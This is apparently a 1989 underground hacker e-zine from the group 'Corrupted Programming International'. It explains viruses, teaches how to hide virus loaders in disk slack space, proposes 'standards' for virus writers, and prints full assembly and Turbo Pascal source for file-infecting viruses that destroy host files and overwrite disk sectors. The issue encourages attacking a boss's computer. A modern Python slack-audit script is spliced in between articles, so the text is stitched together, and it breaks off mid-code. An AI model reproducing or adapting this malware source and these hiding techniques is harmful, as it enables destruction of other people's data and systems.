[2.1]

C O R R U P T E D   P R O G R A M M I N G   I N T E R N A T I O N A L

presents:

Virili And Trojan Horses
A Protagonist's Point Of View
Issue #2

DISCLAIMER::All of the information contained in this newsletter reflects the
thoughts and ideas of the authors, not their actions. The sole purpose of this
document is to educate and spread information. Any illegal or illicit action
is not endorsed by the authors or CPI. The authors and CPI are not responsible
for any information which may present itself as old or mis-interpreted, and
actions by the reader. Remember, 'Just Say No!'

CPI #2
Issue 2, Volume 1
Release Date::July 27,1989

Introduction To CPI#2
---------------------
Well, here is the "long awaited" second issue of CPI, A Protagonist's Point
Of View. This issue should prove a bit interesting, I dunno, but at least
entertaining for the time it takes to read. Enjoy the information and don't
forget the disclaimer.

Oh yes, if you have some interesting articles or an application to send us,
just see the BBS list at the end of this document. Thanx. All applications
and information will be voted on through the CPI Inner Circle. Hope you enjoy
this issue as much as we enjoyed typing it... hehe...

Until our next issue, (which may be whenever), good-bye.

Doctor Dissector

Table of Contents
-----------------
Part  Title                                                   Author
-----------------------------------------------------------------------------
2.1   Title Page, Introduction, & TOC....................... Doctor Dissector
2.2   Another Explanation Of Virili And Trojans............. Acid Phreak
2.3   V-IDEA-1.............................................. Ashton Darkside
2.4   V-IDEA-2.............................................. Ashton Darkside
2.5   The Generic Virus..................................... Doctor Dissector
2.6   Aids.................................................. Doctor Dissector
2.7   Batch File Virus...................................... PHUN 3.2
2.8   Basic Virus........................................... PHUN 3.2
2.9   The Alemeda Virus..................................... PHUN 4.3
2.10  Virili In The News.................................... Various Sources
2.11  Application For CPI................................... CPI Inner Circle

(CPI Node Phone #'s Are In 2.11)

[2.2]

Explanation of Viruses and Trojan Horses
----------------------------------------
Written by Acid Phreak

Like its biological counterpart, a computer virus is an agent of infection,
insinuating itself into a program or disk and forcing its host to replicate
the virus code. Hackers fascinated by the concept of "living" code wrote the
first viruses as projects or as pranks. In the past few years, however, a
different kind of virus has become common, one that lives up to an earlier
meaning of the word: in Latin, virus means poison.

These new viruses incorporate features of another type of insidious program
called a Trojan horse. Such a program masquerades as a useful utility or
product but wreaks havoc on your system when you run it. It may erase a few
files, format your disk, steal secrets--anything software can do, a Trojan
horse can do. A malicious virus can do all this, then attempt to replicate
itself and infect other systems.

The growing media coverage of the virus concept and of specific viruses has
promoted the development of a new type of software. Antivirus programs,
vaccines--they go by many names, but their purpose is to protect from virus
attack. At present there are more antivirus programs than known viruses (not
for long).

Some experts quibble about exactly what a virus is. The most widely known
viruses, the IBM Xmas virus and the recent Internet virus, are not viruses
according to some experts because they do not infect other programs. Others
argue that every Trojan horse is a virus--one that depends completely on
people to spread it.

How They Reproduce:
-------------------
Viruses can't travel without people. Your PC will not become infected unless
someone runs an infected program on it, whether accidentally or on purpose.
PC's are different from mainframe networks in this way--the mainframe Internet
virus spread by transmitting itself to other systems and ordering them to
execute it as a program. That kind of active transmission is not possible on
a PC.

Virus code reproduces by changing something in your system. Some viruses
strike COMMAND.COM or the hidden system files. Others, like the notorious
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
attach themselves to any .COM or .EXE file. In truth, any file on your system
that can be executed--whether it's a program, a device driver, an overlay, or
even a batch file--could be the target of a virus.

When an infected program runs, the virus code usually executes first and then
transfers control to the original program. The virus may immediately infect
other programs, or it may load itself into RAM and continue spreading. If the
virus can infect a file that will be used on another system, it has succeeded.

What They Can Do:
-----------------
Viruses go through two phases: a replication phase and an action phase. The
action doesn't happen until a certain event occurs--perhaps reaching a special
date or running the virus a certain number of times. It wouldn't make sense
for a virus to damage your system the first time it ran; it needs some time
to grow and spread first.

The most vulnerable spot for a virus attack is your hard disk's file
allocation table (FAT). This table tells DOS where every file's data resides
on the disk. Without the FAT, the data's still there but DOS can't find it. A
virus could also perform a low-level format on some or all the tracks of your
hard disk, erase all files, or change the CMOS memory on AT-class computers so
that they don't recognize the hard disk.

Most of the dangers involve data only, but it's even possible to burn out a
monochrome monitor with the right code.

Some virus assaults are quite subtle. One known virus finds four consecutive
digits on the screen and switches two. Let's hope you're not balancing the
company's books when this one hits. Others slow down system operations or
introduce serious errors.

[2.3]

-------------------------------------------------------------------------------
(CPI logo)

"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------

C O R R U P T E D   P R O G R A M M E R S   I N T E R N A T I O N A L

* * * present * * *

"Ok, I've written the virus, now where the hell do I put it?"

By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************

Ok, wow! You've just invented the most incredibly nifty virus. It slices, it
dices, it squishes, it mushes (sorry Berke Breathed) people's data! But the
only problem is, if you go around infecting every damn file, some cute
software company is going to start putting in procedures that checksum their
warez each time they run, which will make life for your infecting virus a
total bitch. Or somebody's going to come up with an incredibly nifty
vaccination util that will wipe it out. Because, I mean, hey, when disk space
starts vanishing suddenly in 500K chunks people tend to notice. Especially
people like me that rarely have more than 4096 bytes free on their HD anyway.
Ok. So you're saying "wow, so what, I can make mine fool-proof", etc, etc. But
wait! There's no need to go around wasting your precious time when the answer
is right there in front of you! Think about it, you could be putting that time
into writing better and more innovative viruses, or you could be worrying
about keeping the file size, the date & time, and the attributes the same.
With this system, you only need to infect one file, preferably one that's NOT
a system file, but something that will get run a lot, and will be able to load
your nifty virus on a daily basis. This system also doesn't take up any disk
space, other than the loader. And the loader could conceivably be under 16
bytes (damn near undetectable).

First of all, you need to know what programs to infect. Now, everybody knows
about using COMMAND.COM and that's unoriginal anyway, when there are other
programs people run all the time. Like DesqView or Norton Utilities or MASM or
a BBS file or WordPerfect; you get the idea. Better still are DOS commands like
Format, Link or even compression utilities. But you get the point. Besides,
who's going to miss 16 bytes, right?

Now, the good part: where to put the damn thing. One note to the programmer:
This could get tricky if your virus is over 2k or isn't written in Assembly,
but the size problem is easy enough, it would be a simple thing to break your
virus into parts and have the parts load each other into the system so that
you do eventually get the whole thing. The only problem with using languages
besides assembly is that it's hard to break them up into 2k segments. If you
want to infect floppies, or smaller disks, you'd be best off to break your
file into 512 byte segments, since they're easier to hide. But, hey, in
assembly, you can generate pretty small programs that do a lot, tho.

Ok, by now you've probably figured out that we're talking about the part of
the disk called 'the slack'. Every disk that your computer uses is divided up
into parts called sectors, which are (in almost all cases) 512 bytes. But in
larger disks, and even in floppies, keeping track of every single sector would
be a complete bitch. So the sectors are bunched together into groups called
'clusters'. On floppy disks, clusters are usually two sectors, or 1024 bytes,
and on hard disks, they're typically 4096 bytes, or eight sectors. Now think
about it, you have programs on your hard disk, and what are the odds that they
will have sizes that always end up in increments of 4096? If I've lost you,
think of it this way: the file takes up a bunch of clusters, but in the last
cluster it uses, there is usually some 'slack', or space that isn't used by
the file. This space is between where the actual file ends and where the
actual cluster ends. So, potentially, you can have up to 4095 bytes of 'slack'
on a file on a hard disk, or 1023 bytes of 'slack' on a floppy. In fact, right
now, run the Norton program 'FS /S /T' command from your root directory, and
subtract the total size of the files from the total disk space used. That's
how much 'slack' space is on your disk (a hell of a lot, even on a floppy).

To use the slack, all you need to do is to find a chunk of slack big enough
to fit your virus (or a segment of your virus) and use direct disk access
(INT 13) to put your virus there. There is one minor problem with this. Any
disk write to that cluster will overwrite the slack with 'garbage' from
memory. This is because of the way DOS manages its disk I/O and it can't be
fixed without a lot of hassles. But, there is a way around even this. And it
involves a popular (albeit outdated and usually ineffectual) form of virus
protection called the READ-ONLY flag. This flag is the greatest friend of
this type of virus. Because if the file is not written to, the last cluster
is not written to, and voila! Your virus is safe from mischievous accidents.
And since the R-O flag doesn't affect INT 13 disk I/O, it won't be in your
way. Also, check for programs with the SYSTEM flag set because that has the
same Read-only effect (even tho I haven't seen it written, it's true that if
the file is designated system, DOS treats it as read-only, whether the R-O
flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM in MS-DOS (not
PC-DOS, it uses different files, or so I am told; I've been too lazy to find
out myself) or a protected (!) COMMAND.COM file in either type of DOS would be
ideal for this. All you have to do is then insert your loader into some
innocent-looking file, and you are in business. All your loader has to do is
read the sector into the highest part of memory, and do a far call to it. Your
virus can then go about waiting for floppy disks to infect, and place loaders
on any available executable file on the disk. Sound pretty neat? It is!

Anyway, have fun, and be sure to upload your virus, along with a README file
on how it works to CPI Headquarters so we can check it out! And remember:
don't target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus.
Even if the Sysop is a leech and you want to shove his balls down his throat.
Because if all the PHP boards go down (especially members of CPI), who the
hell can you go to for all these nifty virus ideas? And besides, it's
betraying your own people, which is uncool even if you are an anarchist. So,
target uncool PD boards, or your boss's computer or whatever, but don't attack
your friends. Other than that, have phun, and phuck it up!

Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)

PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).

Call these boards because the sysops are cool:
Oblivion (SATAN HQ)                 Sysop: Agent Orange (SATAN leader)
System: Utopia (SATAN HQ)           Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ)       Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ)                  Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto

And if I forgot your board, sorry, but don't send me E-mail bitching about it!
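The slack arithmetic above, seen from the other side: an added example (not from the article or from CPI) that computes the per-file and total slack the 'FS /S /T' subtraction gives, then checks whether any file's slack region holds something other than the zero fill a normal write leaves, which is the one trace an INT 13 write into slack cannot avoid leaving. Files are assumed contiguous and the directory entries and volume image are constructed; a real FAT volume would need a cluster-chain walk instead.

```python
"""Slack-space audit for a cluster-allocated volume.  Added example; not code
from the CPI text.  Reproduces the article's two checks from the defender's
side: how much slack a disk carries, and whether any file's slack holds
anything other than zeros."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

HD_CLUSTER = 4096       # cluster sizes quoted in the article
FLOPPY_CLUSTER = 1024


@dataclass(frozen=True)
class Entry:
    """One directory entry.  Files are assumed contiguous on disk (assumption);
    on a real FAT volume you would walk the cluster chain instead."""
    name: str
    first_cluster: int
    size: int


def clusters_used(size: int, cluster: int) -> int:
    return -(-size // cluster)          # ceiling division; 0 for an empty file


def slack_bytes(size: int, cluster: int = HD_CLUSTER) -> int:
    """Unused bytes at the end of the last cluster (0 when size is an exact multiple)."""
    return clusters_used(size, cluster) * cluster - size


def total_slack(entries: List[Entry], cluster: int = HD_CLUSTER) -> int:
    """The article's FS /S /T arithmetic: space allocated minus bytes actually in files."""
    allocated = sum(clusters_used(e.size, cluster) * cluster for e in entries)
    return allocated - sum(e.size for e in entries)


def scan_slack(image: bytes, entries: List[Entry],
               cluster: int = HD_CLUSTER) -> List[Tuple[str, int, int]]:
    """Report (name, image offset, non-zero byte count) for every file whose
    slack region contains non-zero data.  Zero fill is what a normal DOS write
    leaves behind, so anything else deserves a look: stale data, or something
    parked there by direct disk writes that bypass the file system."""
    findings = []
    for e in entries:
        n = slack_bytes(e.size, cluster)
        if n == 0:
            continue                    # exact fit or empty file: no slack
        start = e.first_cluster * cluster + e.size
        nonzero = sum(1 for b in image[start:start + n] if b)
        if nonzero:
            findings.append((e.name, start, nonzero))
    return findings


def make_image(entries: List[Entry], cluster: int = HD_CLUSTER,
               slack_fill: Optional[Dict[str, bytes]] = None) -> bytes:
    """Build a constructed volume image: file bodies are 'A', all slack is zero,
    except where `slack_fill` places test bytes into a named file's slack."""
    n_clusters = max(e.first_cluster + clusters_used(e.size, cluster) for e in entries)
    img = bytearray(n_clusters * cluster)
    for e in entries:
        base = e.first_cluster * cluster
        img[base:base + e.size] = b"A" * e.size
    for name, data in (slack_fill or {}).items():
        e = next(x for x in entries if x.name == name)
        if len(data) > slack_bytes(e.size, cluster):
            raise ValueError(f"{name}: test bytes exceed its slack")
        off = e.first_cluster * cluster + e.size
        img[off:off + len(data)] = data
    return bytes(img)


# Constructed directory: three files on a 4096-byte-cluster disk.
DEMO_ENTRIES = [
    Entry("EDIT.COM", 0, 5000),    # 2 clusters, 3192 bytes of slack
    Entry("LINK.EXE", 2, 8192),    # exact fit, no slack
    Entry("README",   4, 100),     # 1 cluster, 3996 bytes of slack
]


def demo() -> List[Tuple[str, int, int]]:
    """A clean image yields nothing; 16 test bytes in README's slack are flagged."""
    clean = make_image(DEMO_ENTRIES)
    assert scan_slack(clean, DEMO_ENTRIES) == []
    dirty = make_image(DEMO_ENTRIES, slack_fill={"README": b"\x90" * 16})
    return scan_slack(dirty, DEMO_ENTRIES)


if __name__ == "__main__":
    print("total slack:", total_slack(DEMO_ENTRIES), "bytes")
    print("findings:", demo())
```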
[2.4]

-------------------------------------------------------------------------------
(CPI logo)

"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------

C O R R U P T E D   P R O G R A M M E R S   I N T E R N A T I O N A L

* * * present * * *

CPI Virus Standards - Protect yourself and your friends

By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************

One of the main problems with viruses is that once you set one loose, it is
no longer under your control. I propose to stop this by introducing some
standards of virus writing that will enable them to be deactivated whenever
they enter a 'friendly' (CPI) system. In the long run, even the author of the
virus is not immune to being attacked. The following are what I have termed
the CPI standards for writing viruses. They will allow a virus to easily check
any system they are being run on for a type of 'identity badge'. If it is
found, the virus will not infect the system it is being run on. The other
standards are mostly written around this.

CPI Standards for writing viruses -

1 - The virus will have an 'active period' and an 'inactive period'. The
    active periods will be no more than one year in length (to make it more
    difficult to discover the virus). You may release different versions of
    your virus with different 'active periods'. It is not recommended that
    your virus deactivate itself after the set active period, as this would
    enable people to deactivate viruses by using their computer with the date
    set to 2069 or something. It is also required that activation periods
    begin on January 1 and end on December 31. This will coincide with the
    changing identity codes.

2 - The virus will check for an identity code by executing Interrupt 12h
    with the following register settings: AX - 4350, BX - 4920, CX - AB46,
    DX - 554E. If the system is friendly, then a pointer will be returned in
    CX:DX to an ASCIIZ (0-terminated) string which will have different
    contents in different years. The codes are not to be included in any text
    file, and should only be given through E-mail on CPI affiliated systems.
    You can always ask me by sending me mail at The Andromeda Strain BBS. If a
    system is detected as friendly, the virus will not attempt to infect or
    damage it, but it is ok to display a little greeting message about how
    lucky the user was.

3 - We very much encourage you to upload your virus, along with a brief
    description on the workings into the CPI section at The Andromeda Strain
    BBS. Only CPI members will know about your virus. This is so that CPI
    members can share techniques and it also allows us to verify that the
    identity check works. If we see any improvements that could be made, such
    as ways to streamline code, better ways of spreading, etc. we will inform
    you so that you can make the changes if you wish.

4 - It is also suggested that you use ADS standard for virus storage on
    infected disks. This method uses disk slack space for storage and is more
    thoroughly described in a previous text file by me. I think that this is
    the most effective and invisible way to store viruli.

5 - A list of CPI-Standard viruli will be available at all times from The
    Andromeda Strain BBS, to CPI users. Identity strings will also be
    available to anyone in CPI, or anyone who uploads source code to a virus
    which is 100% complete except for the Identity string (it must be written
    to CPI-Standards). Non-CPI members who do this will be more seriously
    considered for membership in CPI.

Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)

PS: This file (by itself) has approx 2.5k of slack.

;[2.5]
;=============================================================================
;
;                                  C*P*I
;
;                    CORRUPTED PROGRAMMING INTERNATIONAL
;                    -----------------------------------
;                            p r e s e n t s
;
;                                 T H E
;                           _               _
;                          (g) GENERIC VIRUS (g)
;                           ^               ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO
; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI INNER CIRCLE
;
;=============================================================================

MAIN:
        NOP                     ;| Marker bytes that identify this program
        NOP                     ;| as infected/a virus
        NOP                     ;|

        MOV AX,00               ;| Initialize the pointers
        MOV ES:[POINTER],AX     ;|
        MOV ES:[COUNTER],AX     ;|
        MOV ES:[DISKS B],AL     ;|

        MOV AH,19               ;| Get the selected drive (dir?)
        INT 21                  ;|

        MOV CS:DRIVE,AL         ;| Get current path (save drive)
        MOV AH,47               ;| (dir?)
        MOV DH,0                ;|
        ADD AL,1                ;|
        MOV DL,AL               ;| (in actual drive)
        LEA SI,CS:OLD_PATH      ;|
        INT 21                  ;|

        MOV AH,0E               ;| Find # of drives
        MOV DL,0                ;|
        INT 21                  ;|
        CMP AL,01               ;| (Check if only one drive)
        JNZ HUPS3               ;| (If not one drive, go the HUPS3)
        MOV AL,06               ;| Set pointer to SEARCH_ORDER +6 (one drive)

HUPS3:  MOV AH,0                ;| Execute this if there is more than 1 drive
        LEA BX,SEARCH_ORDER     ;|
        ADD BX,AX               ;|
        ADD BX,0001             ;|
        MOV CS:POINTER,BX       ;|
        CLC                     ;|

CHANGE_DISK:                    ;| Carry is set if no more .COM files are
        JNC NO_NAME_CHANGE      ;| found. From here, .EXE files will be
        MOV AH,17               ;| renamed to .COM (change .EXE to .COM)
        LEA DX,CS:MASKE_EXE     ;| but will cause the error message "Program
        INT 21                  ;| to large to fit in memory" when starting
        CMP AL,0FF              ;| larger infected programs
        JNZ NO_NAME_CHANGE      ;| (Check if an .EXE is found)

        MOV AH,2CH              ;| If neither .COM or .EXE files can be found,
        INT 21                  ;| then random sectors on the disk will be
        MOV BX,CS:POINTER       ;| overwritten depending on the system time
        MOV AL,CS:[BX]          ;| in milliseconds. This is the time of the
        MOV BX,DX               ;| complete "infection" of a storage medium.
        MOV CX,2                ;| The virus can find nothing more to infect
        MOV DH,0                ;| starts its destruction.
        INT 26                  ;| (write crap on disk)

NO_NAME_CHANGE:                 ;| Check if the end of the search order table
        MOV BX,CS:POINTER       ;| has been reached. If so, end.
        DEC BX                  ;|
        MOV CS:POINTER,BX       ;|
        MOV DL,CS:[BX]          ;|
        CMP DL,0FF              ;|
        JNZ HUPS2               ;|
        JMP HOPS                ;|

HUPS2:                          ;| Get a new drive from the search order table
        MOV AH,0E               ;| and select it, beginning with the ROOT dir.
        INT 21                  ;| (change drive)
        MOV AH,3B               ;| (change path)
        LEA DX,PATH             ;|
        INT 21                  ;|
        JMP FIND_FIRST_FILE     ;|

FIND_FIRST_SUBDIR:              ;| Starting from the root, search for the
        MOV AH,17               ;| first subdir. First, (change .exe to .com)
        LEA DX,CS:MASKE_EXE     ;| convert all .EXE files to .COM in the
        INT 21                  ;| old directory.
        MOV AH,3B               ;| (use root directory)
        LEA DX,PATH             ;|
        INT 21                  ;|
        MOV AH,04E              ;| (search for first subdirectory)
        MOV CX,00010001B        ;| (dir mask)
        LEA DX,MASKE_DIR        ;|
        INT 21                  ;|
        JC CHANGE_DISK          ;|
        MOV BX,CS:COUNTER       ;|
        INC BX                  ;|
        DEC BX                  ;|
        JZ USE_NEXT_SUBDIR      ;|

FIND_NEXT_SUBDIR:               ;| Search for the next sub-dir, if no more
        MOV AH,4FH              ;| are found, the (search for next subdir)
        INT 21                  ;| drive will be changed.
        JC CHANGE_DISK          ;|
        DEC BX                  ;|
        JNZ FIND_NEXT_SUBDIR    ;|

USE_NEXT_SUBDIR:
        MOV AH,2FH              ;| Select found directory. (get dta address)
        INT 21                  ;|
        ADD BX,1CH              ;|
        MOV ES:[BX],W"\"        ;| (address of name in dta)
        INC BX                  ;|
        PUSH DS                 ;|
        MOV AX,ES               ;|
        MOV DS,AX               ;|
        MOV DX,BX               ;|
        MOV AH,3B               ;| (change path)
        INT 21                  ;|
        POP DS                  ;|
        MOV BX,CS:COUNTER       ;|
        INC BX                  ;|
        MOV CS:COUNTER,BX       ;|

FIND_FIRST_FILE:                ;| Find first .COM file in the current dir.
        MOV AH,04E              ;| If there are none, (Search for first)
        MOV CX,00000001B        ;| search the next directory. (mask)
        LEA DX,MASKE_COM        ;|
        INT 21                  ;|
        JC FIND_FIRST_SUBDIR    ;|
        JMP CHECK_IF_ILL        ;|

FIND_NEXT_FILE:                 ;| If program is ill (infected) then search
        MOV AH,4FH              ;| for another. (search for next)
        INT 21                  ;|
        JC FIND_FIRST_SUBDIR    ;|

CHECK_IF_ILL:                   ;| Check if already infected by virus.
        MOV AH,3D               ;| (open channel)
        MOV AL,02               ;| (read/write)
        MOV DX,9EH              ;| (address of name in dta)
        INT 21                  ;|
        MOV BX,AX               ;| (save channel)
        MOV AH,3FH              ;| (read file)
        MOV CH,BUFLEN           ;|
        MOV DX,BUFFER           ;| (write in buffer)
        INT 21                  ;|
        MOV AH,3EH              ;| (close file)
        INT 21                  ;|
        MOV BX,CS:[BUFFER]      ;| (look for three NOP's)
        CMP BX,9090             ;|
        JZ FIND_NEXT_FILE       ;|

        MOV AH,43               ;| This section by-passes (write enable)
        MOV AL,0                ;| the MS/PC DOS Write Protection.
        MOV DX,9EH              ;| (address of name in dta)
        INT 21                  ;|
        MOV AH,43               ;|
        MOV AL,01               ;|
        AND CX,11111110B        ;|
        INT 21                  ;|

        MOV AH,3D               ;| Open file for read/write (open channel)
        MOV AL,02               ;| access (read/write)
        MOV DX,9EH              ;| (address of name in dta)
        INT 21                  ;|

        MOV BX,AX               ;| Read date entry of program and (channel)
        MOV AH,57               ;| save for future use. (get date)
        MOV AL,0                ;|
        INT 21                  ;|
        PUSH CX                 ;| (save date)
        PUSH DX                 ;|

        MOV DX,CS:[CONTA W]     ;| The jump located at 0100h (save old jmp)
        MOV CS:[JMPBUF],DX      ;| the program will be saved for future use.
        MOV DX,CS:[BUFFER+1]    ;| (save new jump)
        LEA CX,CONT-100         ;|
        SUB DX,CX               ;|
        MOV CS:[CONTA],DX       ;|

        MOV AH,57               ;| The virus now copies itself to (write date)
        MOV AL,1                ;| to the start of the file.
        POP DX                  ;|
        POP CX                  ;| (restore date)
        INT 21                  ;|
        MOV AH,3EH              ;| (close file)
        INT 21                  ;|

        MOV DX,CS:[JMPBUF]      ;| Restore the old jump address. The virus
        MOV CS:[CONTA],DX       ;| at address "CONTA" the jump which was at the
                                ;| start of the program. This is done to
HOPS:                           ;| preserve the executability of the host
        NOP                     ;| program as much as possible. After saving,
        CALL USE_OLD            ;| it still works with the jump address in the
                                ;| virus. The jump address in the virus differs
                                ;| from the jump address in memory

CONT    DB 0E9                  ;| Continue with the host program (make jump)
CONTA   DW 0                    ;|
        MOV AH,00               ;|
        INT 21                  ;|

USE_OLD:
        MOV AH,0E               ;| Reactivate the selected (use old drive)
        MOV DL,CS:DRIVE         ;| drive at the start of the program, and
        INT 21                  ;| reactivate the selected path at the start
        MOV AH,3B               ;| of the program.(use old drive)
        LEA DX,OLD_PATH-1       ;| (get old path and backslash)
        INT 21                  ;|
        RET                     ;|

SEARCH_ORDER    DB 0FF,1,0,2,3,0FF,00,0FF

POINTER         DW 0000         ;| (pointer f. search order)
COUNTER         DW 0000         ;| (counter f. nth. search)
DISKS           DB 0            ;| (number of disks)
MASKE_COM       DB "*.COM",00   ;| (search for com files)
MASKE_DIR       DB "*",00       ;| (search for dir's)
MASKE_EXE       DB 0FF,0,0,0,0,0,00111111XB
                DB 0,"????????EXE",0,0,0,0
                DB 0,"????????COM",0
MASKE_ALL       DB 0FF,0,0,0,0,0,00111111XB
                DB 0,"???????????",0,0,0,0
                DB 0,"????????COM",0

BUFFER          EQU 0E00        ;| (a safe place)

BUFLEN          EQU 208H        ;| Length of virus. Modify this accordingly
                                ;| if you modify this source. Be careful
                                ;| for this may change!

JMPBUF          EQU BUFFER+BUFLEN ;| (a safe place for jmp)

PATH            DB "\",0        ;| (first place)
DRIVE           DB 0            ;| (actual drive)
BACK_SLASH      DB "\"
OLD_PATH        DB 32 DUP (?)   ;| (old path)

[2.6]

+-------------------------------+   +--------------------------------------+
|                               | P |               A I D S                |
|  C O R R U P T E D            | R |                                      |
|                               | E |       A NEW AND IMPROVED VIRUS FOR   |
|  P R O G R A M M I N G        | S |          PC/MS DOS MACHINES          |
|                               | E |                                      |
|  I N T E R N A T I O N A L    | N |    CREATED BY: DOCTOR DISSECTOR      |
|                               | T |FILE INTENDED FOR EDUCATIONAL USE ONLY|
|                               | S |  AUTHOR NOT RESPONSIBLE FOR READERS  |
|                               |   |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS|
+-------------------------------+   +--------------------------------------+

Well well, here it is... I call it AIDS... It infects all COM files, but it is
not perfect, so it will also change the date/time stamp to the current system.
Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them!

Anyway, this virus was originally named NUMBER ONE, and I modified the code so
that it would fit my needs. The source code, which is included with this neato
package, was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works.

Well, I added a few things, you can experiment or mess around with it if you'd
like to, and add any mods to it that you want, but change the name and give us
some credit if you do.

The file is approximately 13k long, and this extra memory will be added to the
file it picks as host. If no more COM files are to be found, it picks a random
value from 1-10, and if it happens to be the lucky number 7, AIDS will present
a nice screen with lots of smiles, with a note telling the operator that their
system is now screwed, I mean permanently. The files encrypted containing AIDS
in their code are IRREVERSIBLY messed up. Oh well...

Again, neither CPI nor the author of Number One or AIDS endorses this document
and program for use in any illegal manner. Also, CPI, the author to Number One
and AIDS is not responsible for any actions by the readers that may prove harm
in any way or another. This package was written for EDUCATIONAL purposes only!

{ Beginning of source code, Turbo Pascal 3.01a }
{C-}                          { No Ctrl-C check }
{U-}                          { No user-break check }
{I-}                          { Disable I/O checking so IOresult can be tested }

{ -- Constants --------------------------------------- }

Const
  VirusSize = 13847;          { AIDS's code size }

  Warning :String[42]         { Warning message, also the infection marker }
    = 'This File Has Been Infected By AIDS! HaHa!';

{ -- Type declarations------------------------------------- }

Type
  DTARec = Record             { Data area for file search (DOS DTA layout) }
    DOSnext : Array[1..21] of Byte;
    Attr    : Byte;
    Ftime,
    FDate,
    FLsize,
    FHsize  : Integer;
    FullName: Array[1..13] of Char;
  End;

  Registers = Record          { Register set used for file search }
    Case Byte of
      1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
      2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
  End;

{ -- Variables--------------------------------------------- }

Var
  { Memory offset of program code (COM image starts at CS:0100) }
  ProgramStart : Byte absolute Cseg:$100;
  { Infected marker: lives at CS:0180, i.e. file offset $80 }
  MarkInfected : String[42] absolute Cseg:$180;
  Reg          : Registers;             { Register set }
  DTA          : DTARec;                { Data area }
  Buffer       : Array[Byte] of Byte;   { Data buffer }
  TestID       : String[42];            { To recognize infected files }
  UsePath      : String[66];            { Path to search files }
  { Length of search path (the string's length byte) }
  UsePathLenght: Byte absolute UsePath;
  Go           : File;                  { File to infect }
  B            : Byte;                  { Used }
  LoopVar      : Integer;               { Will loop forever }

{ -- Program code------------------------------------------ }

Begin
  GetDir(0, UsePath);                   { get current directory }
  if Pos('\', UsePath) <> UsePathLenght then
    UsePath := UsePath + '\';
  UsePath := UsePath + '*.COM';         { Define search mask }
  Reg.AH := $1A;                        { Set data area }
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)]:=#0;     { Path must end with #0 }
  Reg.AH := $4E;
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;                        { Set attribute to find ALL files }
  MsDos(Reg);                           { Find first matching entry }
  IF not Odd(Reg.Flags) Then            { If a file found then }
  Repeat
    UsePath := DTA.FullName;
    B := Pos(#0, UsePath);
    If B > 0 then
      Delete(UsePath, B, 255);          { Remove garbage }
    Assign(Go, UsePath);
    Reset(Go);
    If IOresult = 0 Then                { If not IO error then }
    Begin
      BlockRead(Go, Buffer, 2);         { First 256 bytes of the host }
      Move(Buffer[$80], TestID, 43);    { Length byte + 42 chars at $80 }
      { Test if file already ill(Infected) }
      If TestID <> Warning Then         { If not then ... }
      Begin
        Seek (Go, 0);
        { Mark file as infected and .. }
        MarkInfected := Warning;
        { Infect it: overwrite the host from offset 0 with our own image }
        BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
        Close(Go);
        Halt;                           {.. and halt the program }
      End;
      Close(Go);
    End;
    { The file has already been infected, search next. }
    Reg.AH := $4F;
    Reg.DS := Seg(DTA);
    Reg.DX := Ofs(DTA);
    MsDos(Reg);
  { ......................Until no more files are found }
  Until Odd(Reg.Flags);
  Loopvar:=Random(10);
  If Loopvar=7 then
  begin
